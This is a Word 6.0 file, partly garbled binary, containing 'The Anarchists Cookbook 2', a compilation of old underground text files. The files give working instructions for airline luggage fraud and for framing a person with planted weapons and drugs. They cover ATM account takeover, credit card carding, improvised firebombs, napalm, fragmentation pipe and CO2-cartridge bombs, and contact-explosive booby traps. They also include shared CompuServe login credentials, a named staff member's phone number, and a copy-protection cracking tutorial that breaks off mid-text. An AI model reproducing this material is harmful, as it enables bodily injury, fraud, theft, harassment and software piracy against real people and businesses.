ࡱ; vt89  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuwxyz{|}~Root Entry F@<ݹ@CompObjbWordDocumentwObjectPoolq3ݹq3ݹ  FMicrosoft Word 6.0 Document MSWordDocWord.Document.6;  Oh+'0  $ H l   Dh'C:\WINDOWS\WINWORD\TEMPLATE\NORMAL.DOTJames E. CrawfordJames E. Crawford@5@ݲܥe- exwuljljjljljljlxrrrrrr rr6w1uuuuuuuuuuuuuvwgwTw66wjluxuuuu6wujljluuuuuujlujluujlfnjljljljluuu,uThe Anarchists Cookbook 2...More Good Stuff...TeleDoc by...The Uncircumcised Giraffe Digital Anarchy Airlines Did an airline ever lose your luggage? Arrange to have a friend meet you at the terminal gate when you deplane. Give your friend your baggage claim checks and have him/her retrieve your bags from the carousel, then leave the baggage area with your bags. Before your friend leaves the airport with your luggage, be sure to get your claim checks back. Then, you saunter over to the baggage area, spend half an hour waiting for your bags. Ask some clerks for help, then report your "missing" luggage, showing your claim checks as proof. Very few flights ever have a clerk actually check the baggage and collect claim checks. It's foolish, but they don't. Make a polite, but firm scene and demand satisfaction. Normally, the airline people will have you fill out a form and they will attempt to find your luggage. Obviously, they won't find it. Bug them some...write them letters. Soon, you should get a good settlement from the airline. Don't try to pull this one on the same airline more than once! Leaving the airlines and aiming for the individual mark, you can do a lot of personal damage. For instance, if you find your mark is going to use airline travel, you could call and cancel the reservations. You might try to slip a couple rounds of pistol ammunition or a switchblade in to your mark's pocket just before he goes through the metal detector at the airport terminal. You could also slip some drugs into his pocket at the same time. Read a book on pick pocketing to note the technique for doing this. It's quite easy. Leave accurate-looking, but totally bogus hijack scenario plans, bomb diagrams, or orders of battle for terrorist attacks in airport bars and restrooms. This fires up both the rent-a-cops and the real security people. The security delays and resultant hassles with passengers create unhappy people who are angry at airports and airlines. Naturally, the blame for these plans must focus on your mark. If he has really been bugging you it's about time to get even! Animals If your mark is an oily cuss with a credibility problem you should easily pull off this stunt. It involves a cop, reporters, SPCA folks and some farm animals. Call the police and tell them you know about a cock or dog fight that's being held at your mark's home. Explain that you have no morals against animal fighting but you lost big money there last time and think the fights are fixed. Next call your mark and report to him that some people are holding dog or cock fights on his property. Call the reporters and SPCA and tell them all about the fight. Mention that your mark and the cops have a payoff relationship. Give everyone the same general arrival time, never be too specific. Hopefully, all will sort of show up at the same time. You might manipulate things so the press and animal lovers show up first. Even if a real story doesn't develop, you have scattered some strong seeds of distrust. If you want a stronger story, find a dead dog on the road or something and plant it near by and tell the reporters and SPCA where to find the evidence. It will be fun to hear your mark and the cops talk about everything to the reporters.  73  Dead animals are very useful. Wait until your mark goes on a trip and will be leaving his car or house empty for several days. Get into the car or house and stuff very large and very dead animals everywhere. Your mark will probably have to sell his car and fumigate his house when he returns. If you are bothered by big dogs chasing you just take a good quality plastic water pistol and fill it with freshly squeezed lemon juice. Shoot the furball right in the eyes and it'll soon stop the canine harassment. Fun with Automatic Tellers Preface: This is not a particularly easy scam to pull off, as it requires either advanced hacking techniques (TRW or banks) or serious balls (trashing a private residence or outright breaking & entering), but it can be well worth your while to the tune of $500 (five hundred) a day. Laws that will be broken: Credit Fraud, Wire Fraud, Bank Fraud, Mail Fraud, Theft Over $200, Forgery, and possibly a few others in the course of setting the scheme up. The first step is to target your victim. The type person you are looking for is rich. Very rich. Now, don't go trying to hit on J.P. Getty or Johnny Carson or someone who carries a high name recognition. This will just get you into trouble as everyone notices a famous person's name floating across their desk. Instead look for someone who owns a chain of hog feed stores or something discreet like that. We targeted a gentleman who is quite active in the silver market, owning several mines in South Africa and not wanting this to be widely known (he had no desire to be picketed.) Next step, take out a p.o. box in this person's name. Now comes the fun part, requiring some recon on your part. You need to know some fairly serious details about this person's bank dealings. 1) Find out what bank he deals with mainly. This isn't too difficult as a quick run through his office trash will usually let you find deposit carbons, withdrawal receipts, or *anything* that has the bank name on it. 2) Find out the account number(s) that he has at the bank. This can usually be found on the above-mentioned receipts. If not, you can get them in TRW (easier said than done) or you can con them out of a hassled bank teller over the phone (Use your imagination. Talk slowly and understandingly and give plausible excuses ["I work for his car dealership, we need to do a transfer into his account"].) 2a) [optional] If you can, find out if he has an ATM (Automatic Teller) card. You don't need to know numbers or anything, just if a card exists. This can also be ascertained over the phone if you cajole properly. 73  3) Armed with this information, go into action. a) Obtain some nice (ivory quality) stationary. It doesn't have to be engraved or anything, but a $5 or $10 investment to put a letterhead with his initials or something on it couldn't hurt. But the most important thing is that it look good. b) Type a nice letter to the bank notifying them of your address change. Some banks have forms you have to fill out for that sort of thing, so you need to check with the bank first (anonymously, of course). You will have to have a good copy of his signature on hand to sign all forms and letters (again, trash his office). c) Call the bank to verify the new address. d) IMMEDIATELY upon verifying the change of address, send a second letter. If he already has an ATM card, request a second card with the business name engraved in it be sent for company use. If he doesn't have an ATM card, the letter should request one for account number xxxxxx. Ask for two cards, one with the wife's name, to add authenticity. e) Go to the bank and ask for a list of all ATM's on the bank's network. Often the state has laws requiring *all* machines take *all* cards, so you'll probably be in good shape. f) Await the arrival of your new card. The PIN (personal identification number) is included when they send out a card. After picking up the card, forget that you ever even *knew* where the p.o. box was, and make sure you didn't leave fingerprints. g) Begin making the maximum daily withdrawal on the card (in most cases $500/day), using a different machine each time. Since many of these machines have cameras on them, wear a hat & jacket, or a ski mask to be really paranoid. To cut the number of trips you have to make in half, be at an ATM a few minutes before midnight. Make one $500 withdrawal right before midnight, and another one right after. This cuts down on the number of trips, but police or bank officials may spot the pattern and start watching machines around midnight. Use your own judgement. Conclusion: Before using the card, make sure that all fingerprints are wiped from it. Usually the first hint you will have that they have caught on to your scam is that the machine will keep the card. Also, avoid using machines in your own town unless it is a big city (Chicago, Milwaukee, Dallas, etc...).  73  Bombs FIREBOMBS Most fire bombs are simply gasoline filled bottles with a fuel soaked rag in the bottle's mouth. The original Molotov cocktail, and still about the best, was a mixture of one part gasoline and one part motor oil. The oil helps it to cling to what it splatters on. NAPALM About the best fire bomb is napalm. It has a thick consistency, like jam and is best for use on vehicles or buildings. Napalm is simply one part gasoline and one part soap. The soap is either soap flakes or shredded bar soap. Detergents won't do. The gasoline must be heated in order for the soap to melt. The usual way is with a double boiler where the top part has at least a two-quart capacity. The water in the bottom part is brought to a boil and the double boiler is taken from the stove and carried to where there is no flame. Then one part, by volume, of gasoline is put in the top part and allowed to heat as much as it will and the soap is added and the mess is stirred until it thickens. A better way to heat gasoline is to fill a bath tub with water as hot as you can get it. It will hold its heat longer and permit a much larger container than will the double boiler. MATCH HEAD BOMB Simple safety match heads in a pipe, capped at both ends, make a devastating bomb. It is set off with a regular fuse. A plastic Baggie is put into the pipe before the heads go in to prevent detonation by contact with the metal. FUSE IGNITION FIRE BOMB A four strand home made fuse is used for this. It burns like fury. It is held down and concealed by a strip of bent tin cut from a can. The exposed end of the fuse is dipped into the flare igniter. To use this one, you light the fuse and hold the fire bomb until the fuse has burned out of sight under the tin. Then throw it and when it breaks, the burning fuse will ignite the contents. Bomb 2 The Destructor Materials: 1 CO2 Cartridge - Used in BB guns - come in a pack of five - Target sells them for $1.50 a pack. 73 2 Size D Estes model rocket engines - found in most hobby stores where model rockets are sold. (Any size will work but D's have the most powder) 2 Solar igniters - usually come with the engines - used to ignite the bomb 1 Bottle of fast drying model glue 1 Scissors 1 Funnel 1 roll of masking tape 1 hammer 1 container (jar, cup, glass) 1 20 foot wire (+ and -) 1 6 volt (or 12 volt) lantern battery Procedure: The CO2 cartridge is the body of the bomb and when it explodes will fragment .. so stand back.. Metal flies!! If you have a CO2 BB gun then you will have many empty cartridges. For those of you who have never bought CO2 cartridges you will have to find some other way of emptying them. I have done this on accident before, simply insert a nail in the top of the cartridge and watch the CO2 gas come out!! Very cold if you let it touch you. I do not suggest doing it this way, so if possible, ask a friend who has a CO2 BB gun for their empty CO2 cartridges. Make the hole bigger: Once you have an empty cartridge you have to make the hole bigger, otherwise it is very difficult to get the explosive compounds into the cartridge. Take a nail and pound the hole bigger. The size of the hole is very important. If it is too big the cartridge will act as a rocket instead of a bomb. Prepare the explosive ingredients: Unroll the model rocket engines with a pocket knife, until you have the black chunk of boosting compound. Throw away the unrolling paper. You may remove the block of clay since this is not explosive. Powder the chunk with the hammer until you have fine powder. To make the fine powder, lay down some wax paper on the floor. Find a screen mesh, and filter the powder, leaving the big pieces on top and the fine powder on the wax paper. Then pour the powder on the wax paper into a container. After you have the two size D engines powdered and in the container you are ready to put the powder into the CO2 cartridge. Get the ingredients in the cartridge: Make a funnel out of paper (a floppy disk jacket works well, with the end clipped off) and tape it around the end of the cartridge. Slowly pour the powder from the container into the funnel. You may have to use a toothpick to help the powder through the funnel and into the cartridge. If your powder is not fine enough it might jam in the hole and you will have to remove the funnel and clear the passage. Shake the cartridge every so often until you can't hear the powder in there. The cartridge is now full of explosive powder. Prepare the igniter:  73  Clip the paper protector of the igniter with a scissors and bend the wires so they are relatively straight. (Be careful not to break the igniter when bending the wires) Coat the igniter with glue except for the ends, and let it dry for a few minutes. Then insert the igniter into the cartridge leaving the ends exposed. The tip of the igniter must touch the powder for the powder to ignite. This should be no problem if you have enough powder in the cartridge. Put glue around the igniter and the tip of the cartridge and let dry. Connecting the bomb: Then bend the end wires of the igniter and connect to your 20 foot wire. Put tape around the end wires and cartridge. The Destructor is now ready to detonate. Detonating the bomb: When you have found a place to detonate The Destructor, stretch the wire the full 20 feet and then touch both wires to the two negative and positive connectors. This will send a 6 volt charge through the wire and to the igniter. The igniter will ignite the explosive compounds in the cartridge and in a matter of seconds........ BOOM!!!!!!!!!!!!!! Basic Carding INTRODUCTION: This is an attempt to tutor individuals lacking in the knowledge of how to get items from stores without actually paying for them and not having to show up in person. Instead, charge them to someone else's credit card (also known as 'CC') account. This process is known as 'credit carding' or just 'carding' amongst people in that field of acquiring goods. STEP I: ------ ACQUIRING CREDIT CARD INFORMATION: The first and foremost thing to do is acquire CC information. The things that are necessary are: name of the card holder, expiration date, account number, and the CC type. (that is: Visa, American Express, MasterCard, etc.) WHAT TO LOOK FOR: In order to get these important bits of information, you would have to know where to look. The cards themselves have all of this information right on them. However, an easier and better place to find these things is on the carbons that stores use to put the info. on the different sheets to give to The CC company, themselves or their bookkeeper, and the customer himself. On these carbons, it should be pretty obvious as to which is which. HOW-TO GET CARBONS: The best way to get the carbons is by rooting through the trash cans (or dumpster(s)) of a store. This process is known as 'trashing'. The best places to trash depends on the time of the year in which you are looking for the carbons. For instance, during 73  the Christmas season: toy stores, during major season (temperature) changes: clothing stores, etc. Basically, go wherever there is the largest buying attraction during that period of time. Whenever, there is no major buying attraction, try independent clothing stores or department stores. TRASHING CLOTHES: I suggest that you wear some really grubby, old, etc. clothing when you go trashing, because you never know what some of these stores are gonna throw away. If you are kind sqeemish, wear rubber gloves and those pant covers that farmers use, I am not sure what they are called, but they're made of rubber and will keep the nasties away from you when you go trashing. CARBONS: After you have gotten a considerable number (30 - 500) of carbons, you need to identify the proper parts of the carbon. The important parts of the carbon will look like Diagram 1 does. D i a g r a m 1 +------------------------------------------------------------+ | Account Number exp date(1) | | exp date(2) exp date(3) | | Card holder's name | ܖr | | | | | | | | | +------------------------------------------------------------+ CARD HOLDER'S NAME: (SEE DIAG. 1) The card holder's name should be quite clear on all carbons that you find in the same place as on diagram one. If it is not there, it should be easy to distinguish from any other information on the carbon. EXP. DATES: (SEE DIAG. 1) The expiration dates can be in two forms. The forms are thus: XX/XX THRU XX/XX which would be found on exp date(2) and is used on American Express cards, and XX-XX which is found in either exp date(1) or exp date(3) and is for either VISA or MasterCard. ACCOUNT NUMBER: (SEE DIAG. 1) Account numbers are generally found in the top, left-hand corner of the carbon. They can be found in other places, but that is the most common. CARD TYPE: The formats of account numbers are quite varied between CC companies. Diagram 2 shows which major card types use which formats. You can use diagram two, or a reasonable facsimile, for identification of CC types on your carbons. If the number is not of any of these formats, discard that carbon, for it'd not be of a 73  major accepted gender. D i a g r a m 2 +----------------------=----------------------+ | CC type | Format of the act. # | +----------------------=----------------------+ | American Express | XXXX XXXXXX XXXXX | | MasterCard | XXXX XXXX XXXX XXXX | | Revolv-a-charge | NXXN XXXX NXXXXX X | | Visa | XXXX XXX XXX XXX | +----------------------=----------------------+ X represents a number N represents a letter STEP II: ------- THE DROP SPOT: Before you order your merchandise, you must figure out a place to send the merchandise. You do ** NOT ** want the store from which you shop, the card holder, or the CC company to know where you really live. QUALIFICATIONS: In order for a house to qualify as an inconspicuous drop spot, it must meet several requirements. It must look like a place where people could really live and be getting things sent through UPS to them. It must be a place that the owners will not 'visit' too regularly. It may have a 'FOR SALE' sign in front of it, but it is better if it doesn't. And most important of all, it must be a place that you can check up on often. Make sure you WRITE DOWN the address in a place where you will NOT forget it and where it will be readily accessible when you are ordering merchandise. (SEE STEP III) STEP III: -------- ORDERING MERCHANDISE: If you have a catalog or something that you are ordering from, then follow the directions given in the book for making phone orders. Make sure the address given is the drop spot's address, and NOT yours. If your voice doesn't sound mature enough to be an adults, the order-taker might be suspicious. There are two ways to solve this. The first is to tell the order taker that you are doing this for your parents 'cause they are too busy to order it, so they made you do it. This is risky. The second and better one is to have someone else order it (WHILE YOU WATCH HIM/HER!) for you. The person that does this should be VERY trustworthy. Be sure to know the expected time of delivery. (SEE STEP IV) STEP IV: ------- THE PICK-UP: You should leave a little note inside the front door or hanging in some place that even the dumbest UPS driver could see. This note should be typed or printed and give directions as to where to leave the package(s). Things like the back porch or under 73  a tarpaulin or in a box on the front porch usually work best. And say something to the effect of each family member working and that you have a tight schedule and anything other than leaving it where mentioned would be very inconvenient for you. You then approach the building every other night starting the day after the expected delivery to get your 'present'. Credit Checks When you somehow obtain a card, before you order something, you must first check the card to see if it is good. Here is how to do that: Dial: 1-800-554-2265 10# - Mastercard 20# - Visa 1067# - Auth. # 51# -Merchant Number CC number + # - when asked for card number MMYY + # - When asked for exp. date Dolars+*+Cents+# - When asked for amount Now, here is what you must do to check the limit of the card. Call up and enter all the card stuff and when it says amount start at 5000*00#, and it will almost ALWAYS say declined, unless it is a Preferred or Gold card. From them on, go down in $1000 increments until it says approved and gives you an auth. number to write on the customers receipt. Then enter $500, it should say declined, if it doesn't and says approved, check it for 500 again, then it will say declined. Cherry Bomb Materials: 1. Ping pong ball. 2. Black powder. 3. Fuse, at least 5 in. 4. Nail polish. 5. Any type of tape. Procedure: 1. Use an ice pick to poke a hole in the ping pong ball, then use a razor blade to make a big enough hole to put the black powder in. 2. Place the black powder in. Probably 3/4 full is best. 3. Now, insert the fuse into the ice pick hole. 4. Cover the entire ball with nail polish. This is used to make it louder. 5. Finally, cover the whole thing with tape, also used for loudness.  73  Hacking the Compuserve Infomation Service Compuserve is a multiuser networked Pay by Hour service. But this can be beat. At current rates, CIS (Compuserve) charges $6.50 for 300 baud and $12.75 for 1200/2400 baud, 9600 can only be accessed by Hardwired clients. Thus you see the need for this file. At the time this was written, all information in this file was correct. Enough of this, on to the file. Logging on to Compuserve ------------------------ In order to logon to CIS you need one of the following. 1) A Telenet, Tymnet, Or CIS Port 2) A Credit Card 3) Above the IQ of a houseplant That is all you need, I know for some of you the 3rd one is tough, but try. Ok, you have all this, call your local port, logon to CIS, then you should get a [User ID:] Prompt, type [177000,5000], this is the Ziff PCMagnet User Id. Now, if you entered it correctly, then you should get the [Password:] Prompt, at This type [Pc*Magnet]. You will next be given a Welcome Message, then, you will get yet another Prompt. It should ask you for your Agreement Number, type [Z10D8810]. That is the end of the prompts. Here's where the IQ of above a houseplant comes into play. You now have to think. It will ask you various questions, ranging from your country to your Social Security number. Answer them however you want, but I wouldn't use your real info. If you want the second password (Needed to access some things), you will have to give an address where you can drop by and pick it up. Some ideas are sending to your neighbors, but use your last name, it will end up at your house. This is safe, I have used it. Or you can rent a Post Office box for about 6 months. Once you have done all this, and answer the questions, and read the propoganda, you will see [Entering PCMagnet]. You are done. So what do I do Now? -------------------- Ok, if you get this far, you have the IQ of above your fern. You can go one of two places, CIS or PCMagnet (Where you are now). You can stay in PCMagnet, but there isn't much there. So, I would type [Go Cis] This will bring you to Compuserve. Once on CIS, you can do many thing, ranging from downloading files, to real time chat on forums to online games. Next, I will list some interesting places to go. Where do I go? -------------- There are alot on interesting places to go on Compuserve. There are some places that you can't access without a second password, so that must be attained to get on CB. But you can goto the forums, the games, and alot of other things. I will list some places that I like to go. [Go Rocknet] will bring you to a rather nice forum that is populated by some very nice people. It has confrences at 7am till 9am (Breakfast Club), at 12pm till 1pm (Lunch Bunch), and from around 10pm till 1am. I can be found in this forum alot. 73  [Go Hsx100] will bring you to the Human Sexuality Forum, but it's not what you think, they are very interesting people that hang around here. The Confrence's there are from around 10pm till about 4am. They last along time. These are just my favorites, but if you type [Go Forums], it will give you a list of forums that you can Hang around on. There are some things to look out for on CIS. Some sights you will see ------------------------ There are some things to look out for on CIS. You must be careful when you see one of these things. They are on the look out for US. If you see a [70000,xxxx] id, that is a Security Officer, they will deleate you if you are not careful. If you see a [70006,xxxx] that is a Wizard, he can also deleate you. They some times do not deleate you they just /gag you, that means you can't be seen, you are not in the userlist. This only applys to Confrence and CB. *LooLoo* is a person to be careful not to see, she is a mother fucker. She is a powerful person, she can /gag you on any forum, but SHE CAN NOT deleate you, only a security account can. Her user id is [70006,522] so if you see that ID, be careful. I have talked to her voice on several occassions, she is fun to call and bother about CIS, if you want her number, it is [614/764-2302] Her real name is Patricia Phelps. There is also another not so nice person on Compuserve , he is Dan Piskur, he is the Head of Security. He uses the Handles, [Dan'l or Ghost] he CAN deleate you on sight. Misc Info. ---------- Here's come info on Project Numbers. (User Id's) 70000,xxxx = CIS Security 70003,xxxx = CIS Employe 70004,xxxx = CIS Employe 70005,xxxx = Radio Shack Demo 70006,xxxx = Wizard 70007,xxxx = Complementary Account 76701,xxxx = Forum Sysop 76703,xxxx = Forum Sysop 76704,xxxx = Forum Sysop 72251,xxxx = Ziff Account (You) 72261,xxxx = Ziff Account 72271,xxxx = Ziff Account 72301,xxxx = Ziff Account Some things, a Wizard is a very powerful person, they have access to /gag you. A Ziff account is an account created by this method. Change Machine Fraud I. There are certain types of money changing machines...The one YOU need is the kind where ya put yer bill in the tray ,push the tray in to get yer change... II. Once you got the right machine,get a $5 or a $1 ,it helps if the bill is WRINKLED...Then tear a notch in the bill on the lower left side of the bill. Cut the notch about 3.5 cm. from the lower left hand corner... III. 73  Now, go to the machine..put the bill in the tray and slide it in... Now what will happen is the machine will have so far read the bill right and it will spit out yer change.. Then when it reads the notch, it will think the bill is fucked up and reject it and like you will have the change and yer bill... For this to werk right you must have done this right..it does take practice but once you can do this your local Money Changer will be yer bank... How to Pick Master Combination Locks 1st number: Get out any of the Master locks so you know what's going on. The handle part (the part that springs open when you get the combination), pull on it, but not enough so that the knob won't move. While pulling on it turn the knob to the left until it won't move any more. Then add 5 to this number. Congradulations, you now have the 1st number. 2nd number: Ok, spin the dial around a couple of times, then go to the 1st number you got, then turn it to the right, bypassing the 1st number once. WHEN you have bypassed. Start pulling the handle and turning it. It will eventually fall into the groove and lock. While in the groove pull on it and turn the knob. If it is loose go to the next groove; if it's stiff you got the second number. 3rd number: After getting the 2nd, spin the dial, then enter the 2 numbers, then after the 2nd, go to the right and at all the numbers pull on it. The lock will eventually open if you did it right. If can't do it the first time, be patient, it takes time. Preparation of Contact Explosives The contact explosives we will be describing use only a few chemicals. Some do need extra caution to keep from causing trouble. Iodine Crystals Though most people don't realize it, Iodine is not a brown liquid, but a steel-grey solid. The tincture of iodine you buy at the drugstore actually contains just a tiny bit of iodine dissolved in a jarful of inexpensive alcohol, and resold at a huge mark up. We'll be using iodine in the crystalline 73 form. On contact with your skin, it will produce a dark stain that won't wash off with soap and water. We'll talk about removing these stains later. If it gets hot, it vaporizes into a purple cloud, that smells like the chlorine in a swimming pool. This cloud is dangerous to inhale, since it will condense in your lungs, and is corrosive. Since we won't need to heat this stuff, it is not a problem, but you should make sure that you don't let any iodine crystals spill onto a hot surface. If you don't touch it and keep it away from your face, you shouldn't have any troubles. Ammonium Hydroxide This is just good old household ammonia. Be sure to get the clear kind. The sudsy stuff won't be too useful. It is made from ammonia gas dissolved in water, and every time you open the bottle, it loses some of its strength, so be sure to use fresh stuff. We need it to be as strong as possible. Some of the formulas given here use lab grade concentrated ammonium hydroxide. It is much stronger than the supermarket kind, and is very unkind to skin or especially the eyes. It is a good idea to wear eye protection with even the supermarket grade. Though we don't usually worry about this when using household ammonia for cleaning, we usually dilute it for that. Here we'll be using it straight out of the bottle, and it is much more corrosive in that form. Never use this material if you don't have real good ventilation, as the ammonia vapors can be overpowering. Potassium Iodide This is a reasonably safe chemical. You get Potassium ions in some of the fruit you eat, and Iodide ions (usually as Sodium Iodide) are added to the table salt you buy at the store. So, while you don't directly eat this chemical, you do eat the components that make it up. Don't be scared of this stuff. Sodium Thiosulfate Otherwise known as photographic hypo. When dissolved in water, this will remove the iodine stains left by touching iodine crystals, and exploding contact explosive. Not particularly nasty stuff, but make sure to wash it off after cleaning yourself with it. General Information This is a powerful and highly sensitive explosive. A dust sized particle will make a sharp crack or popping sound. A piece the size of a pencil lead will produce an explosion as loud as any of the largest firecrackers or cherry bombs. It cannot be exploded by any means when wet, and therefore can be handled and applied with safety. When dry, it will explode with the touch of a feather, or a breath of air. The strength of the ammonia water you use will have a direct effect on the strength of the final product. If you use supermarket ammonia, the explosive will work, but not as spectacularly as if you use a 15% or higher (10 to 15 molar) solution. The stronger it is, the better. You'll also need filter paper, and a funnel. A properly folded coffee filter will do nicely if you don't have the filter paper. If you're not sure how to fold filter paper, check an 73 elementary chemistry textbook. Methods of Preparation 1.) Granular Explosive. This is the easiest kind, and the only kind that will work reasonably well with supermarket ammonia. Crush enough iodine crystals to make a pile of powder equal to the volume of a pencil eraser. Do not grind into a fine powder. Put about 4 ounces or 1/2 measuring cup of strong ammonia water into a small container with the iodine, and seal it for about 5 to 10 minutes, shaking frequently. While the mixture is reacting, get your filter paper ready. While it is best to consult a book that shows how to do this, you take the circle of filter paper, fold it in half, fold it again at right angles to the first fold, and then open it to form a cone. Open or close it as needed to make it conform to the angle of the funnel, and moisten it a little to make it stick in place. Place the funnel over a container that will catch the waste liquid. Let the mixture settle long enough for the sediment to settle, and pour off as much of the clear liquid as possible before filtering the sediment. Pour the remaining liquid and sediment into the filter. The sediment (and the filter paper covered with it!!!) is your explosive. The small amount you have made will go a lot farther than you realize. Particularly if you used good strong ammonia. Place the explosive in an airtight leakproof pill bottle. As this explosive is unstable by nature, fresh amounts give better results than stale ones that have been sitting around for a day or so. Best results are obtained with small fresh batches. But as you'll see, there are a few tricks you can do with this material that do require it to sit for a day or more. The explosive should be stored and applied while wet. 2.) Paint type explosive. This will use up a lot of iodine crystals. Make up a strong tincture of iodine using about 4 ounces or 1/2 measuring cup of rubbing alcohol, denatured alcohol, or wood alcohol. Wood alcohol is preferable. Add iodine crystals and shake thoroughly until no more will dissolve. Pour the liquid into a fruit jar. Add the ammonium hydroxide and stir the mixture until the mixture is a chocolate brown and shows a little of the original color of the iodine. The amount of ammonia necessary will depend on its strength. An equal volume of ammonia is usually sufficient for a 15% or higher solution. The solution should be filtered at once, and shouldn't ever wait more than 10 or 15 minutes, because it starts to dissolve again. The explosive again should be stored and applied while wet. This material is chemically the same as the granular explosive, but because it was precipitated from a solution, it is much more finely divided, and the reaction happens almost simultaneously, so you can get it out before it all vanishes back into the solution. 3.) Paint type #2. Dissolve 1 gram of potassium iodide in about 90cc of 18%-22% ammonium hydroxide. Add 4 grams of pulverized iodine. A deep black sediment should start forming. Let stand, and stir frequently for five minutes. Then, filter as usual. While the potassium iodide is not an integral part of the chemical reaction, the dissolved potassium iodide will allow the iodine crystals in turn to dissolve, and its common ion effect will cause less iodine crystals to be wasted. Since the iodine is by far the most expensive ingredient, you'll save money in the long run by using it. Care in Handling And Storage 73  Because this material is so unstable it deteriorates quickly. Don't make any more than you need to use in the next 24 hours. If you can't use it all immediately, the container you keep it in should be recapped tightly after use and the mouth wiped clean. The explosive can cause dark stain damage to things as rugs, clothing, chair seats, wallpaper, and light or clear plastics. A strong solution of sodium thiosulfate is effective for removing stains from hands and clothing before they set. Never leave the container of explosive in direct sunlight for more than a few minutes, as it will weaken the strength. Do NOT attempt to make a large explosion as it is dangerous and can cause deafness. All equipment used should be thoroughly washed and the used filter paper flushed down the toilet. Under no circumstances attempt to handle the dried material which is extremely explosive and hazardous. If you can avoid storing the material in a container at all, there will be no chance that a loose stopper will let the material dry out and become a potential bomb. Tiny bits of this can be great fun, but it has to be handled with care. Application Although largely a scientific curiosity, this explosive finds itself well suited for practical jokes. It may easily be painted on the bottom side of light switches, sprinkled on floors, painted in keyholes, pencil sharpeners, doorknobs and in hundreds of other unsuspected places. It is also ideal for catching locker thieves and desk prowlers. It will leave a dark stain on his hands when it explodes, and only you will know how to remove it. Reaction Equations Ammonium Ammonium Ammonium Nitrogen Iodine Hydroxide Iodide Tri Iodide Water 3I + 5NH OH ---> 3NH I + NH NI + 5H O 2 4 4 3 3 2 The theoretical yield of explosive from pure iodine is 54.1% by weight. The remainder of the iodine may be recovered for reuse from the ammonium iodide waste product by evaporating the waste liquid and treating with chlorine if a chemistry lab is available. The contact explosive is Ammonium Nitrogen Tri-Iodide, which explodes into iodine, nitrogen, and ammonia. Ammonium Nitrigen Tri-Iodide Iodine Nitrogen Ammonia 2NH NI ---> 3I + N + 2NH 3 3 2 2 3 Some Clever Uses For This Material 1.) Contact Explosive Torpedos. Get some gelatin capsules, the kind pills are made of. Fill the small half with uncooked dry tapioca until it is half full. Then place a wet blob of contact explosive about 4 times the size of a straight pin head on top of it. Either the granular or paint type explosive will work. The capsule is then filled the rest of the way up with tapioca until, when the 73 capsule is put together, the grains of tapioca are packed tightly, and none are loose. If this is not done properly, the torpedos could go off prematurely, and the joke would be on you. The torpedos are then moistened at the joints to seal them and stored until the next day. They are not sensitive enough until the next day and too sensitive the day after, so plan your activities accordingly. These torpedos are the most fiendish devices made. You can lay one on top of a door, where it will roll off when the door is opened, and it will explode on contact with the floor. If you toss one some distance away it will appear as if someone else was responsible for the explosion. These torpedos are ideal as booby traps or for pulling practical jokes with. They may be carried in a small box filled with cotton until needed. Just treat the box gently, and all will be well. 2.Contact Explosive Booby Traps. Prepare a small amount of contact explosive. Cut strips of newspaper 1 1/2 inches wide and 1 foot long. Cut a piece of string 1 foot long. Put a small amount of wet contact explosive on the strip of paper 1 inch from the end. Double the string. Now pull one end of the string back until there is a double loop in the string about 1 inch long. Do not tie. Lay this double loop across the wet contact explosive and tightly roll the paper and glue the end. Put away for a few days until thoroughly dry. When dry, pull the ends of the string and the booby trap will explode. The strings, when pulled, rub against the dry contact explosive, and make it explode. Getting The Materials There are quite a few chemical supply houses that you can mail order the materials you need. You'll have to sign a form stating that you're over 21 and won't use the chemicals for the types of things we're learning here. Note that the people who run these supply houses know what Iodine Crystals and Ammonium Hydroxide can do when mixed together, and if you order both from the same place, or in the same order, it may arouse some suspicion. Check the classified ads in the back of magazines like Popular Science for the current supply houses. Order as many catalogs as you can find. Not all sell every chemical that you may want for this series. Also, you can break the orders up so as not to look suspicious. Lastly, some houses are used to selling to individuals, and will provide chemicals in 1 or 4 ounce lots, while others prefer to sell to large institutions, and sell their wares in 1 or 5 pound jugs. Split up your orders according to the quantities of each item you think you will be needing. An ounce of Iodine Crystals will cost three or four dollars an ounce, and an ounce bottle of iodine is pretty tiny, but it goes a long way. If you had to buy that by the pound, you might just want to forget the whole thing. **************************************** * * * Cracking On the IBMpc * * Part I * * * **************************************** Introduction 73 ------------ For years, I have seen cracking tutorials for the APPLE computers, but never have I seen one for the PC. I have decided to try to write this series to help that pirate move up a level to a crackest. In this part, I will cover what happens with INT 13 and how most copy protection schemes will use it. I strongly suggest a knowledge of Assembly (M/L) and how to use DEBUG. These will be an important figure in cracking anything. INT-13 - An overview -------------------- Many copy protection schemes use the disk interrupt (INT-13). INT-13 is often use to either try to read in a illegaly formatted track/sector or to write/format a track/sector that has been damaged in some way. INT-13 is called like any normal interrupt with the assembler command INT 13 (CD 13). [AH] is used to select which command to be used, with most of the other registers used for data. INT-13 Cracking Collage ----------------------- Although, INT-13 is used in almost all protection schemes, the easiest to crack is the DOS file. Now the protected program might use INT-13 to load some other data from a normal track/sector on a disk, so it is important to determine which tracks/sectors are important to the protection scheme. I have found the best way to do this is to use LOCKSMITH/pc (what, you don't have LS. Contact your local pirate for it.) Use LS to analyze the diskette. Write down any track/sector that seems abnormal. These track are must likely are part of the protection routine. Now, we must enter debug. Load in the file execute a search for CD 13. Record any address show. If no address are picked up, this mean 1 or 2 things, the program is not copy protected (bullshit) or that the check is in an other part of the program not yet loaded. The latter being a real bitch to find, so I'll cover it in part II. There is another choice. The CD 13 might be hidden in self changing code. Here is what a sector of hidden code might look like -U CS:0000 1B00:0000 31DB XOR BX,BX 1B00:0002 8EDB MOV DS,BX 1B00:0004 BB0D00 MOV BX,000D 1B00:0007 8A07 MOV AL,[BX] 1B00:0009 3412 XOR AL,12 1B00:000B 8807 MOV [BX],AL 1B00:000D DF13 FIST WORD... In this section of code, [AL] is set to DF at location 1B00:0007. When you XOR DF and 12, you would get a CD(hex) for the INT opcode which is placed right next to a 13 ie, giving you CD13 or INT- 13. This type of code can't and will not be found using debug's [S]earch command. Finding Hidden INT-13s ---------------------- The way I find best to find hidden INT-13s, is to use a program called PC- WATCH (TRAP13 works well also). This program traps the interrupts and will print where they were called from. Once running this, you can just disassemble 73 around the address until you find code that look like it is setting up the disk interrupt. An other way to decode the INT-13 is to use debug's [G]o command. Just set a breakdown at the address give by PC-WATCH (both programs give the return address). Ie, -G CS:000F (see code above). When debug stops, you will have encoded not only the INT-13 but anything else leading up to it. What to do once you find INT-13 ------------------------------- Once you find the 